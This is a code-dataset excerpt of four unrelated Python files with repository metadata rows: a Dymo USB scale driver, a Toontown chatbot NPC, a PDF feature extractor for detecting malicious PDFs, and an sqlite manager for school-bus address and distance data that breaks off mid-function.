class DymoUSBScale(object):
"""
Driver for Dymo USB postage scale
"""
def __init__(self,sleep_time=1.0,init=True):
self.VENDOR_ID = 0x0922
self.PRODUCT_ID = 0x8004
self.DATA_MODE_GRAMS = 2
self.DATA_MODE_OUNCES = 11
if init:
self.device_init()
def device_init(self):
# find the USB device
self.device = usb.core.find(idVendor=self.VENDOR_ID,
idProduct=self.PRODUCT_ID)
try:
self.device.detach_kernel_driver(0)
except Exception, e:
print "Unable to detach USB device from kernel driver. Continuing..."
pass
# use the first/default configuration
self.device.set_configuration()
# first endpoint
endpoint = self.device[0][(0,0)][0]
# see charlesreid1.com/wiki/USB_Scale/RaspberryPi
self.ea = endpoint.bEndpointAddress
self.ps = endpoint.wMaxPacketSize
try:
self.device.read(self.ea, self.ps)
except usb.core.USBError:
pass
def read_value(self):
# flush out the first few data values
preload = 3
while preload > 0:
try:
self.device.read(self.ea,self.ps)
except usb.core.USBError:
pass
preload -= 1
# read a data packet
attempts = 3
data = None
while data is None and attempts > 0:
try:
data = self.device.read(self.ea, self.ps)
except usb.core.USBError as e:
data = None
if e.args == ('Operation timed out',):
attempts -= 10
continue
raw_weight = data[4] + data[5] * 256
data_mode = data[2]
return datetime.now(), raw_weight, data_mode
def get_weight(self,mode):
return self.get(mode)
def get_grams(self):
return self.get('grams')
def get_ounces(self):
return self.get('ounces')
def get_lboz(self):
return self.get('lboz')
def get_lb(self):
return self.get('lb')
def get(self,units):
timestamp, raw_weight, data_mode = self.read_value()
ounces=0
grams=0
g2oz = 0.035274
if data_mode==self.DATA_MODE_OUNCES:
ounces = raw_weight * 0.1
grams = ounces/g2oz
elif data_mode==self.DATA_MODE_GRAMS:
grams = raw_weight
ounces = grams*g2oz
if units=='grams':
return timestamp,grams
elif units=='ounces':
return timestamp,ounces
elif units=='lboz':
lb, oz = divmod(ounces, 16)
return timestamp,lb,oz
elif units=='lb':
lb = timestamp,ounces/16.0
return timestamp,lb
def echo(self):
print "Grams:",self.get_grams()
print "lb:",self.get_lb()
print "lb/oz:",self.get_lboz()
print "oz:",self.get_ounces()
| 21.564417
| 81
| 0.547937
|
4a0a0b9b37ab6ea490b66f2a40b9d780c5d60546
| 2,834
|
py
|
Python
|
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | 1
|
2021-02-25T06:22:49.000Z
|
2021-02-25T06:22:49.000Z
|
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | null | null | null |
toontown/toon/DistributedSmartNPCAI.py
|
TrueBlueDogemon/Toontown
|
ebed7fc3f2ef06a529cf02eda7ab46361aceef9d
|
[
"MIT"
] | 2
|
2020-11-08T03:38:35.000Z
|
2021-09-02T07:03:47.000Z
|
from otp.ai.AIBaseGlobal import *
from direct.task.Task import Task
from pandac.PandaModules import *
from DistributedNPCToonBaseAI import *
from toontown.quest import Quests
import time
from QuestionMgr import ChatterBotFactory, ChatterBotType
from direct.task import Task
class DistributedSmartNPCAI(DistributedNPCToonBaseAI):
    """AI-side NPC that holds a chat conversation with one toon at a time
    through a ChatterBot (Cleverbot) session.

    State:
      personOfInterest -- avId of the toon currently in conversation (0 = none)
      stopDouble       -- avId just dismissed, used to suppress an immediate re-greet
      index            -- message count within the current conversation
      myTask           -- inactivity-watchdog task (see tylerTask)
    """
    def __init__(self, air, npcId, questCallback = None, hq = 0):
        DistributedNPCToonBaseAI.__init__(self, air, npcId, questCallback)
        self.air = air
        # avId of the toon currently talking to this NPC (0 = nobody).
        self.personOfInterest = 0
        # avId that was just dismissed; blocks an immediate re-greet.
        self.stopDouble = 0
        self.nameOfInterest = ''
        self.factory = ChatterBotFactory()
        self.engine = self.factory.create(ChatterBotType.CLEVERBOT)
        self.brain = self.engine.create_session()
        # Watchdog task; restarted on every message (see restartTask).
        self.myTask = taskMgr.doMethodLater(0.5, self.tylerTask, 'tylerTask')
        # Number of exchanges so far in the current conversation.
        self.index = 0
    def tylerTask(self, task):
        """Inactivity watchdog: keeps running while the conversation is
        fresh; after ~25s of task time it says goodbye and resets state."""
        # NOTE(review): after 5s of task time the exchange counter resets;
        # presumably this forgives the 4-message limit for slow typers.
        if task.time >= 5:
            self.index = 0
        if task.time <= 25:
            return task.cont
        self.response('I guess you don\'t want to talk anymore %s' % self.nameOfInterest + '...', self.personOfInterest)
        self.stopDouble = self.personOfInterest
        self.personOfInterest = 0
        self.nameOfInterest = ''
        return task.done
    def restartTask(self):
        """Reset the watchdog's clock by removing and re-adding the task."""
        taskMgr.remove(self.myTask)
        taskMgr.add(self.myTask)
    def avatarEnter(self):
        """Handle a toon approaching: greet it if the NPC is free and the
        toon was not just dismissed; otherwise dismiss it."""
        if not self.personOfInterest:
            sender = self.air.getAvatarIdFromSender()
            if not sender == self.stopDouble:
                name = self.air.doId2do.get(sender).getName()
                self.personOfInterest = sender
                self.nameOfInterest = name
                self.sendUpdate('greet', [self.npcId, sender])
                # Fresh chatbot session per conversation.
                self.brain = self.engine.create_session()
            else:
                # Toon was just dismissed; turn it away (reason code 2).
                self.sendUpdate('dismiss', [sender, 2])
                pass
        else:
            #Tyler is busy!
            pass
    def talkMessage(self, sender, message):
        """Handle a chat message from the current conversation partner."""
        if sender == self.personOfInterest:
            self.index += 1
            # End the conversation after 4 exchanges (reason code 1).
            if self.index >= 4:
                self.stopDouble = self.personOfInterest
                self.personOfInterest = 0
                self.nameOfInterest = ''
                taskMgr.remove(self.myTask)
                self.index = 0
                self.sendUpdate('dismiss', [sender, 1])
                return
            self.restartTask()
            self.generateAnswer(message, sender)
    def generateAnswer(self, message, sender):
        """Feed the message to the chatbot session and send back its reply."""
        name = self.air.doId2do.get(sender).getName()
        answer = self.brain.think(message)
        self.response(answer, sender)
    def response(self, response, sendTo):
        """Broadcast the NPC's reply to the client and reset the watchdog."""
        self.sendUpdate('respond', [self.npcId, response, sendTo])
        self.restartTask()
| 36.333333
| 120
| 0.5988
|
4a0a0c0c6755ea5e814bd4a821452c2b051a2206
| 12,915
|
py
|
Python
|
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
classes/dataPDF.py
|
AUFinalProject/Phase5
|
540e6feee957679728ec0709da82eb93d00bed51
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------------------------------------------------------------------------------------------
# The our class for PDF files
# @Authors: Alexey Titov and Shir Bentabou
# @Version: 1.0
# -------------------------------------------------------------------------------------------------------------------------------------------------------------
# libraries
import numpy as np
import subprocess
import imutils
import cv2
import re
import os
import nltk
from nltk.corpus import stopwords
from bs4 import BeautifulSoup
import csv
# global lists
# NOTE(review): port_good and bad_word are not referenced anywhere in this
# file; presumably consumed by the external URL heuristics -- confirm.
port_good = [":443/", ":80/", ":8080/"]
bad_word = ["target", "&", "?", "download", "php", "loader", "login", "=", "+"]
# pdfid tag names whose counts are collected by defaultJS().
default_features = ["obj", "endobj", "stream", "endstream", "/ObjStm", "/JS", "/JavaScript", "/AA", "/Launch", "/OpenAction", "/AcroForm", "/RichMedia"]
#                     0        1        2          3           4        5         6          7      11          8             9            10
# /ObjStm counts the number of object streams. An object stream is a stream object that can contain other objects, and can therefor be used to obfuscate objects (by using different filters).
# /JS and /JavaScript indicate that the PDF document contains JavaScript.
# Almost all malicious PDF documents that I've found in the wild contain JavaScript (to exploit a JavaScript vulnerability and/or to execute a heap spray).
# Of course, you can also find JavaScript in PDF documents without malicious intend.
# /AA and /OpenAction indicate an automatic action to be performed when the page/document is viewed.
# All malicious PDF documents with JavaScript I've seen in the wild had an automatic action to launch the JavaScript without user interaction.
# The combination of automatic action and JavaScript makes a PDF document very suspicious.
# /RichMedia can imply presence of flash file.
# /Launch counts launch actions.
# /AcroForm this tag is defined if a document contains form fields, and is true if it uses XML Forms Architecture; not a real Tag ID
# global variables
REPLACE_BY_SPACE_RE = re.compile('[/(){}\[\]\|@,;]')  # punctuation replaced by a space in clean_text()
BAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')  # anything outside this whitelist is removed in clean_text()
STOPWORDS = set(stopwords.words('english'))  # NLTK English stop words (requires the 'stopwords' corpus)
class dataPDF:
    """Feature extractor for a single PDF file.

    Wraps external tools (peepdf output, pdfid, AnalyzePDF, JaSt's is_js,
    support_union) plus OpenCV to turn one PDF into three feature groups:
      __histblur        -- 8x8x8 HSV color histogram (512 bins) of the
                           rendered page image + 1 blur score (length 513)
      __dsurlsjsentropy -- pdfid tag counts + URL features + JavaScript
                           features + entropies (length 32)
      __text_tfidf      -- cleaned text, also appended to a shared CSV
    """
    __filename = ""                  # path to pdf file
    __image = ""                     # path to image of pdf file
    __text = ""                      # path to JavaScript extracted from the pdf file
    __shortname = ""                 # name of pdf file
    __histblur = []                  # vector of color histogram and blur. Length = 513
    __text_tfidf = ""                # correct text from first page or vector for tfidf
    __dsurlsjsentropy = []           # vector of tags, urls, JavaScript and entropy. Length = 32
    __folder_path = ""               # path to classes folder
    __isjs_path = "JaSt-master/js/"  # path for is_js.py code
    __csv_path = ""                  # CSV collecting (File, Text) rows
    # constructor: derive every tool/artifact path from folder_path + dataset
    def __init__(self, filename, folder_path, dataset):
        self.__folder_path = folder_path + "classes/"
        self.__isjs_path = folder_path + "classes/JaSt-master/js/"
        self.__filename = folder_path + dataset + "/" + filename
        self.__image = folder_path + "IMAGES/" + filename.replace('pdf', 'jpg')
        self.__text = folder_path + "TEXTS/" + filename + ".txt"
        self.__shortname = filename
        self.__csv_path = folder_path + "pdfFILES.csv"
    # this function extracts a color histogram for an image;
    # returns a flat 512-element vector, or a list of -1 on error
    def extract_color_histogram(self, image, bins=(8, 8, 8)):
        try:
            # extract a 3D color histogram from the HSV color space using
            # the supplied number of `bins` per channel
            hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
            hist = cv2.calcHist([hsv], [0, 1, 2], None, bins,[0, 180, 0, 256, 0, 256])
            # handle normalizing the histogram if we are using OpenCV 2.4.X
            if imutils.is_cv2():
                hist = cv2.normalize(hist)
            # otherwise, perform "in place" normalization in OpenCV 3
            else:
                cv2.normalize(hist, hist)
            # return the flattened histogram as the feature vector
            return hist.flatten()
        except Exception:
            hist = list([-1]*512)  # -1 marks an error. Using the * operator for initialization
            return hist
    # this function detects blur; returns a one-element set {score}
    # ({-1} on error); score < 110 means the image is blurred
    def detect_image_blur(self, imgPath):
        try:
            image = cv2.imread(imgPath)
            # NOTE(review): `gray` is computed but unused -- the Laplacian
            # below runs on the color image; possibly `gray` was intended.
            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
            score = cv2.Laplacian(image, cv2.CV_64F).var()
            detect = {score}  # score < 110, an image is blur
            return detect
        except Exception:
            detect = {-1}  # -1, error
            return detect
    # calculate histogram and blur; fills self.__histblur (length 513)
    def calculate_histogram_blur(self):
        try:
            # load the image and extract the class label (assuming that our
            # path as the format: /path/to/dataset/{class}.{image_num}.jpg
            image = cv2.imread(self.__image)
            # histogram to characterize the color distribution of the pixels
            # in the image
            hist = self.extract_color_histogram(image)
            # detect blur
            blur = self.detect_image_blur(self.__image)
            hist = list(hist) + list(blur)
            self.__histblur = np.array(hist)
        except Exception:
            self.__histblur = list([-1]*513)  # -1, error. Using the * operator for initialization
    # this function cleans text from garbage
    def clean_text(self, text):
        """
        text: a string
        return: modified initial string
        """
        text = BeautifulSoup(text, "lxml").text  # HTML decoding
        text = text.lower()  # lowercase text
        text = REPLACE_BY_SPACE_RE.sub(' ', text)  # replace REPLACE_BY_SPACE_RE symbols by space in text
        text = BAD_SYMBOLS_RE.sub('', text)  # delete symbols which are in BAD_SYMBOLS_RE from text
        text = ' '.join(word for word in text.split() if word not in STOPWORDS)  # delete stopwords from text
        return text
    # this function cleans *text*, caches it on the instance and appends a
    # (File, Text) row to the shared CSV
    def save_text(self, text):
        self.__text_tfidf = self.clean_text(text)
        with open(self.__csv_path, 'a') as csvFile:
            fields = ['File', 'Text']
            writer = csv.DictWriter(csvFile, fieldnames = fields)
            row = [{'File': self.__shortname, 'Text':self.__text_tfidf}]
            writer.writerows(row)
        csvFile.close()  # NOTE(review): redundant -- the `with` block already closed it
    # function for part of JavaScript
    # Sources:
    # https://stackoverflow.com/questions/29342542/how-can-i-extract-a-javascript-from-a-pdf-file-with-a-command-line-tool
    # js extraction code
    # https://github.com/Aurore54F/JaSt
    # JAST project
    def pdfJS(self):
        """Return 8 JavaScript features for the extracted-JS text file:
        [num_objects, num_js_lines, num_backslash, num_evals, num_slashx,
        num_slashu0, type_js, encoding]; all -1 if the JS file is missing."""
        # variables for features
        num_objects = 0
        num_js_lines = 0
        num_backslash = 0
        num_evals = 0
        num_slashx = 0
        num_slashu0 = 0
        type_js = 0  # no - 0, valid - 1, malformed - 2
        encoding = 0
        # handling the case that previous file failed to parse
        errorfile = os.path.isfile(self.__text)  # holds boolean value
        if not errorfile:
            print(self.__shortname + " failed parsing!")
            features = [-1, -1, -1, -1, -1, -1, -1, -1]
            return features
        else:
            temp_file = open(self.__text, 'r')
            # copy content from temp file to text file
            try:
                # NOTE(review): str(readlines()) is the repr of a list, so this
                # iterates single CHARACTERS, not lines -- the substring tests
                # below can then never match; verify against the intended
                # behavior (likely `for line in temp_file.readlines():`).
                for line in str(temp_file.readlines()):
                    if "// peepdf comment: Javascript code located in object" in line:
                        num_objects = num_objects + 1
                    elif line != '\n':
                        num_js_lines = num_js_lines + 1
                        # string literal for backslash
                        num_backslash = num_backslash + line.count("\\")
                        num_evals = num_evals + line.count("eval")
                        num_slashx = num_slashx + line.count("\\x")
                        num_slashu0 = num_slashu0 + line.count("\\u")
            except:
                encoding = -1
            temp_file.close()
            # check if valid JS or malformed JS (via JaSt's is_js.py)
            if num_js_lines != 0:
                isjs = subprocess.Popen(['python', self.__isjs_path + "is_js.py", "--f", self.__text], stdout=subprocess.PIPE)
                isjs.wait()
                for line in isjs.stdout:
                    if "malformed" in str(line):
                        type_js = 2
                    elif " valid" in str(line):
                        type_js = 1
            # save and return features
            features = [num_objects, num_js_lines, num_backslash, num_evals, num_slashx, num_slashu0, type_js, encoding]
            return features
    # function for part of Entropy
    # ans[0] - total_entropy; ans[1] - entropy_inside; ans[2] - entropy_outside
    # Source: https://github.com/hiddenillusion/AnalyzePDF
    def entropy(self):
        """Parse the first three float values printed by AnalyzePDF.py;
        returns [-1, -1, -1] on any failure."""
        try:
            ans = []
            p = subprocess.Popen(['python', self.__folder_path + 'AnalyzePDF-master/AnalyzePDF.py', self.__filename], stdout=subprocess.PIPE)
            p.wait()
            for (i, line) in enumerate(p.stdout):
                line = str(line)
                pattern = r"(\d+.\d+)"
                num = re.search(pattern, line).group()
                ans.append(float(num))
                if(i == 2):
                    break
            return ans
        except Exception:
            ex = [-1, -1, -1]
            return ex
    # function for part of pdfid.py
    def defaultJS(self):
        """Collect the counts pdfid.py reports for the tags listed in
        default_features (in pdfid's output order); 12 x -1 on failure."""
        try:
            ans = []
            p = subprocess.Popen(['python', self.__folder_path + 'pdfid_v0_2_5/pdfid.py', self.__filename], stdout=subprocess.PIPE)
            p.wait()
            for line in p.stdout:
                line = str(line)
                if '%PDF' in line or line.startswith('PDFiD'):
                    continue
                pattern1 = r"\s*(\S+)\s+(\d+)"
                m = re.search(pattern1, line)
                if m is not None:
                    key = m.group(1)
                    if key in default_features:
                        ans.append(int(m.group(2)))
            return ans
        except Exception:
            ex = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1]
            return ex
    # function for part of URLs
    def URLs(self):
        """Run support_union.py on the PDF and parse its printed integer
        list; 9 x -1 on failure."""
        try:
            p = subprocess.Popen(['python', self.__folder_path + 'support_union.py', self.__filename], stdout = subprocess.PIPE)
            p.wait()
            out, err = p.communicate()
            out = str(out)
            # strip the bytes-repr wrapper (b'...\n') and list brackets
            out = out.replace('b\'','').replace('\\n\'','').replace('[','').replace(']','').split(',')
            if ('-1' in out[0]):
                return list(map(int, out))
            out = list(map(int, out))
            return out
        except Exception:
            ex = [-1, -1, -1, -1, -1, -1, -1, -1, -1]
            return ex
    # this function calculates vector __dsurlsjsentropy
    def calculate_dsurlsjsentropy(self):
        # tags
        ans = self.defaultJS()
        # urls
        urls = self.URLs()
        # JavaScript
        js = self.pdfJS()
        # entropy
        entropies = self.entropy()
        # union: tags ++ urls ++ js ++ entropies
        ans = ans + urls
        ans = ans + js
        ans = ans + entropies
        self.__dsurlsjsentropy = np.array(ans)
    # this function returns the full path of the pdf file
    def getFilename(self):
        return self.__filename
    # this function returns the short filename
    def getShortname(self):
        return self.__shortname
    # this function returns the path to the image
    def getImage(self):
        return self.__image
    # this function returns the histogram+blur vector
    def getImgHistogram(self):
        return self.__histblur
    # this function returns the tags/urls/js/entropy feature vector
    def getFeatVec(self):
        return self.__dsurlsjsentropy
    # this function returns the cleaned text
    def getText(self):
        return self.__text_tfidf
    # print all information (debug helper)
    def printData(self):
        print(self.__filename)
        print(self.__image)
        print(self.__text)
        print(self.__shortname)
        print(self.__histblur)
        print(self.__text_tfidf)
        print(self.__dsurlsjsentropy)
| 42.483553
| 190
| 0.536895
|
4a0a0c45a5803962754651c062bb9a85a979f60d
| 26,007
|
py
|
Python
|
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
python/DBmanagement.py
|
billsioros/MMGP
|
d9cdd206e9baa4991ade1304dc4be53e1859b49d
|
[
"MIT"
] | null | null | null |
import sqlite3
import os
from time import sleep
from hashlib import sha1 as sha1
import util
import csv
cwd = os.getcwd()
class DBManager:
""" Connects to an sqlite3 database if it exists in current directory, or creates a new one
Connection = current connection """
def __init__(self, fileName, new=False, GoogleAPIKey=None, OpenAPIKey=None):
self.Connection = None
self.Cursor = None
if new:
if os.path.isfile(fileName):
os.remove(fileName)
print "Creating new Database..."
self.CreateDatabase(fileName)
else:
if not os.path.isfile(fileName):
raise IOError(fileName + " does not exist!")
self.FileName = fileName
self._GoogleAPIKey = GoogleAPIKey
self._OpenAPIKey = OpenAPIKey
self._MapsHandler = None
self._Parser = None
self.Connect(fileName)
def CreateDatabase(self, fileName):
self.Connect(fileName)
sql = "CREATE TABLE Student ( \
StudentID varchar(255), \
LastName varchar(255), \
FirstName varchar(255), \
AddressID varchar(255), \
Level varchar(255), \
Class varchar(255), \
Phone varchar(255), \
Mobile varchar(255), \
OtherPhone1 varchar(255), \
OtherPhone2 varchar(255), \
Primary Key (StudentID), \
Foreign Key (AddressID) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Address ( \
AddressID varchar(255), \
Road varchar(255), \
Number varchar(255), \
ZipCode int, \
Prefecture varchar(255), \
Municipal varchar(255), \
Area varchar(255), \
GPS_X decimal(20, 14), \
GPS_Y decimal(20, 14), \
FullAddress varchar(255), \
TranslatedAddress varchar(255), \
FormattedAddress varchar(255), \
Primary Key (AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Schedule ( \
ScheduleID varchar(255), \
StudentID varchar(255), \
AddressID varchar(255), \
Monday bit, \
Tuesday bit, \
Wednesday bit, \
Thursday bit, \
Friday bit, \
DayPart varchar(255), \
FullNote varchar(255), \
EarlyPickup varchar(255), \
LatePickup varchar(255), \
EarlyDrop varchar(255), \
LateDrop varchar(255), \
Around varchar(255), \
AltAddress varchar(255), \
Comment text, \
BusSchedule varchar(255), \
ScheduleOrder int, \
ScheduleTime varchar(255), \
Primary Key (ScheduleID), \
Foreign Key (AddressID) References Address(AddressID), \
Foreign Key (StudentID) References Student(StudentID) )"
self.Cursor.execute(sql)
sql = "Create Table MorningDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table NoonDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table StudyDistance ( \
AddressID_1 varchar(255), \
AddressID_2 varchar(255), \
Duration int, \
Distance int, \
Primary Key (AddressID_1, AddressID_2), \
Foreign Key (AddressID_1) References Address(AddressID), \
Foreign Key (AddressID_2) References Address(AddressID) )"
self.Cursor.execute(sql)
sql = "Create Table Bus ( \
BusID varchar(255), \
Number int, \
Capacity int, \
Primary Key (BusID) )"
self.Cursor.execute(sql)
sql = "Create Table Depot ( \
AddressID varchar(255), \
Road varchar(255), \
Number varchar(255), \
ZipCode int, \
Prefecture varchar(255), \
Municipal varchar(255), \
Area varchar(255), \
GPS_X decimal(20, 14), \
GPS_Y decimal(20, 14), \
FullAddress varchar(255), \
TranslatedAddress varchar(255), \
FormattedAddress varchar(255), \
Primary Key (AddressID) )"
self.Cursor.execute(sql)
self.Commit()
self.Disconnect()
return
def DestroyDatabase(self):
sql = "Drop Table Student"
self.Cursor.execute(sql)
sql = "Drop Table Address"
self.Cursor.execute(sql)
sql = "Drop Table Distance"
self.Cursor.execute(sql)
self.Connection.commit()
self.Connection.close()
os.remove(self.FileName)
return
def Connect(self, fileName):
if not self.Connection:
self.Connection = sqlite3.connect(fileName)
self.Cursor = self.Connection.cursor()
self.__InitRowFactory()
def Disconnect(self):
self.Connection.close()
self.Connection = None
self.Cursor = None
self.MapsHandler = None
self.FileName = None
self.GoogleAPIKey = None
self.OpenAPIKey = None
""" Note To Self:
Be sure to make Tables a double iterable of type (RowList, DayPart)"""
def InsertStudent(self, Tables, overwrite=False, GeoFailsFile=None):
requests = 0
# Pull Addresses from Database
Addresses = self.GetAddresses()
ExistingStudents = self.GetStudents()
# Delete the whole students table but not the addresses table - [Update]
# Check all the new students for previously found addresses - [New, Update]
# Insert those students with previously found address ID - [New, Update]
# Insert all students with new addresses (whether they have GPS coords or not) - [New, Update]
# Delete any address that is not connected to a student after the new entries finish being inserted - [Update]
self.Cursor.execute("Delete From Schedule")
if overwrite:
self.Cursor.execute("Delete From Address")
self.Cursor.execute("Delete From Student")
InsertedSchedules = dict()
# Tables is list of lists of Rows of Data
for RowList, DayPart in Tables:
NoGPS = list()
# Insert All Records that already have GPS coordinates
for Row in RowList:
# Concatenate the Address to a single string and hash it
FullAddress, TranslatedAddress = util.ConcatenateAddress(Row["Road"], Row["Num"], Row["ZipCode"], Row["Muni"], Row["Area"], Row["Prefec"], "GREECE")
HashAddress = self.__Hash(TranslatedAddress)
# If address has not been added to the database add it
if Row["GPSX"] and Row["GPSY"]:
if not Addresses.has_key(HashAddress):
# Decimals must be turned to strings
GPSX = str(Row["GPSX"])
GPSY = str(Row["GPSY"])
Addresses[HashAddress] = (GPSX, GPSY)
AddressList = [HashAddress, Row["Road"], Row["Num"], Row["ZipCode"], Row["Prefec"], Row["Muni"], Row["Area"], GPSX, GPSY, FullAddress, TranslatedAddress, None]
self.Cursor.execute("Insert Into Address \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
# If there is no GPS coordinates add address to GeoCoding list and geocode it after
# all other addresses have been inserted. This way if an address is already in the database
# we do not have to geocode it. (Trying to reduce geocoding requests)
else:
NoGPS.append((Row["ID"], Row["LastName"], Row["FirstName"], HashAddress, \
Row["Road"], Row["Num"], Row["ZipCode"], Row["Prefec"], Row["Muni"], Row["Area"], TranslatedAddress, FullAddress))
# Add student to the database
# Format Some Values
if not ExistingStudents.has_key(Row["ID"]):
if Row["Class"]:
Row["Class"] = Row["Class"].replace('-', "")
Row["Class"].strip()
if Row["Class"] == "":
Row["Class"] = None
if Row["Phone"] != None:
Row["Phone"].strip(" ")
if Row["Phone"] == "":
Row["Phone"] = None
if Row["Mobile"] != None:
Row["Mobile"].strip(" ")
if Row["Mobile"] == "":
Row["Mobile"] = None
if Row["OtherPhone1"] != None:
Row["OtherPhone1"].strip(" ")
if Row["OtherPhone1"] == "":
Row["OtherPhone1"] = None
if Row["OtherPhone2"] != None:
Row["OtherPhone2"].strip(" ")
if Row["OtherPhone2"] == "":
Row["OtherPhone2"] = None
StudentList = [Row["ID"], Row["LastName"], Row["FirstName"], HashAddress, Row["Level"], Row["Class"],
Row["Phone"], Row["Mobile"], Row["OtherPhone1"], Row["OtherPhone2"]]
self.Cursor.execute("Insert Into Student \
Values (?,?,?,?,?,?,?,?,?,?)", StudentList)
ExistingStudents[Row["ID"]] = 1
if not InsertedSchedules.has_key(Row["ScheduleID"]):
if "Notes":
self.__InitParser()
NotesDict = self._Parser.Parse("Notes")
EarlyPickup = NotesDict["Early Pickup"]
LatePickup = NotesDict["Late Pickup"]
EarlyDrop = NotesDict["Early Drop"]
LateDrop = NotesDict["Late Drop"]
AltAddress = NotesDict["Address"]
Comment = NotesDict["Comments"]
Around = NotesDict["Around"]
else:
EarlyPickup = None
LatePickup = None
EarlyDrop = None
LateDrop = None
AltAddress = None
Comment = None
Around = None
ScheduleList = [Row["ScheduleID"], Row["ID"], HashAddress, Row["Mon"], Row["Tue"], Row["Wen"], Row["Thu"], Row["Fri"], DayPart,
Row["Notes"], EarlyPickup, LatePickup, EarlyDrop, LateDrop, Around, AltAddress, Comment,
Row["BusSchedule"], Row["ScheduleOrder"], Row["ScheduleTime"]]
self.Cursor.execute("Insert Into Schedule \
Values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", ScheduleList)
InsertedSchedules[Row["ScheduleID"]] = 1
# Insert All Records that do not have GPS coordinates
i = 0 # Geocoding per sec
for ID, LastName, FirstName, HashAddress, Road, Num, ZipCode, Prefec, Muni, Area, TranslatedAddress, FullAddress in NoGPS:
if not TranslatedAddress:
continue
# If address has not been added to the database, geocode it and add it
if not Addresses.has_key(HashAddress):
self.__InitMapsHandler()
# Only 10 requests per sec
if i == 10:
sleep(1) # Sleep 1 seconds for safety
i = 0
requests += 1
FormattedAddress, GPSX, GPSY = self._MapsHandler.Geocode(TranslatedAddress)
i += 1
valid = False
if FormattedAddress:
Addresses[HashAddress] = (GPSX, GPSY)
# Find Error and Log it into a csv of your choosing
valid = self.__LogGeocodingError(ID, LastName, FirstName, FormattedAddress, TranslatedAddress, DayPart, GeoFailsFile)
else:
valid = self.__LogGeocodingError(ID, LastName, FirstName, "None", TranslatedAddress, DayPart, GeoFailsFile)
if valid:
AddressList = [HashAddress, Road, Num, ZipCode, Prefec, Muni, Area, GPSX, GPSY, \
FullAddress, TranslatedAddress, FormattedAddress]
self.Cursor.execute("Insert Into Address \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
self.__DiscardAddresses()
def InsertBus(self, RowList):
Buses = self.GetBuses()
for Bus in RowList:
ToAdd = [Bus["Code"], int(Bus["Number"]), Bus["Capacity"]]
if not Buses.has_key(Bus["Code"]):
self.Cursor.execute("Insert Into Bus \
Values (?,?,?)", ToAdd)
else:
self.Cursor.execute("Update Bus \
Set Number = ?, Capacity = ? \
Where BusID = ?", ToAdd)
def InsertDepot(self, RowList):
for Road, Number, ZipCode, Prefecture, Municipal, Area in RowList:
FullAddress, TranslatedAddress = util.ConcatenateAddress(Road, Number, ZipCode, Municipal, Area, Prefecture, "GREECE")
HashAddress = self.__Hash(TranslatedAddress)
self.__InitMapsHandler()
FormattedAddress, GPSX, GPSY = self._MapsHandler.Geocode(TranslatedAddress)
AddressList = [HashAddress, Road, Number, ZipCode, Prefecture, Municipal, Area, GPSX, GPSY,\
FullAddress, TranslatedAddress, FormattedAddress]
self.Cursor.execute("Insert Into Depot \
Values (?,?,?,?,?,?,?,?,?,?,?,?)", AddressList)
def InsertDistances(self, DayPart, direct=False, fileName=None):
if DayPart != "Morning" and DayPart != "Noon" and DayPart != "Study":
raise ValueError("Error: Non valid DayPart.")
Table = DayPart + "Distance"
self.Cursor.execute(\
" Select Address.AddressID, Address.GPS_X, Address.GPS_Y \
From Address \
Where exists ( Select * \
From Student, Schedule \
Where Schedule.AddressID = Address.AddressID and Student.StudentID = Schedule.StudentID \
and Schedule.DayPart = ?)", [DayPart])
Addresses = self.Cursor.fetchall()
Depot = self.GetDepot()
Addresses.append(Depot)
Origins = list()
for Address in Addresses:
Origins.append((Address["AddressID"], (Address["GPS_Y"], Address["GPS_X"])))
self.__InitMapsHandler()
Matrix = self._MapsHandler.DistanceMatrix(Origins)
if not direct:
if not fileName:
"Error: No file was given, writing on \"tempDistances.tsv\""
DatabaseDir = os.path.realpath(os.path.dirname(self.FileName))
fileName = DatabaseDir + "/tempDistances.tsv"
logcsv = open(fileName, "r")
if logcsv.readline():
logcsv.close()
logcsv = open(fileName, "a+")
else:
logcsv.close()
logcsv = open(fileName, "w+")
logcsv.write("DayPart\tID1\tID2\tDuration\tDistance\n")
for id1, id2, duration, distance in Matrix:
logcsv.write(DayPart + "\t" + str(id1) + "\t" + str(id2) + "\t" + str(duration) + "\t" + str(distance) + "\n")
logcsv.close()
else:
self.Cursor.execute("Delete From " + Table)
for id1, id2, duration, distance in Matrix:
# All previous distances will be overwritten
if not duration:
duration = 0
if not distance:
distance = 0
sql = "Insert into " + Table + " Values(\"" + str(id1) + "\", \"" + str(id2) + "\", " + str(duration) + ", " + str(distance) + ")"
